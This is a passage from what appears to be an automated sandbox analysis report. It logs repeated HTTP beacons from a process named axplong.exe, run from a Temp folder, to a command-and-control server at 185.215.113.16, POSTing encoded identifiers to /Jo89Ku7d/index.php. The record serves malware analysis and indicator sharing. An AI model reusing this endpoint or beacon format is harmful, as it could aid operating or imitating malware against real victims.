                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:23.730155945 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:23.952552080 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.749726185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:24.072804928 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:24.797843933 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:24.798696995 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:25.032542944 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.749727185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:25.272520065 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:25.993844032 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:26.019258022 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:26.249974966 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.749728185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:26.368300915 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:27.500171900 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:27.500407934 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:27.501046896 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:27.731050014 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.749729185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:27.852840900 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:28.542624950 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:28.557410955 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:28.932651997 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.749730185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:29.041997910 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:29.761863947 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:29.763020039 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:30.196727991 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    24192.168.2.749731185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:30.321341038 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:31.151405096 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:31.152122021 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:31.375447989 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    25192.168.2.749732185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:31.494915009 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:32.204375982 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:32.205123901 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:32.433598042 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    26192.168.2.749733185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:32.540627003 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:33.258707047 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:33.298801899 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:33.526134968 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    27192.168.2.749734185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:33.646493912 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:34.345848083 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:34.346648932 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:34.568824053 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    28192.168.2.749735185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:34.680780888 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:35.538794041 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:35.539658070 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:35.771563053 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    29192.168.2.749736185.215.113.16803312C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:29:35.884841919 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:36.602411985 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:36.603429079 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:36.834774017 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
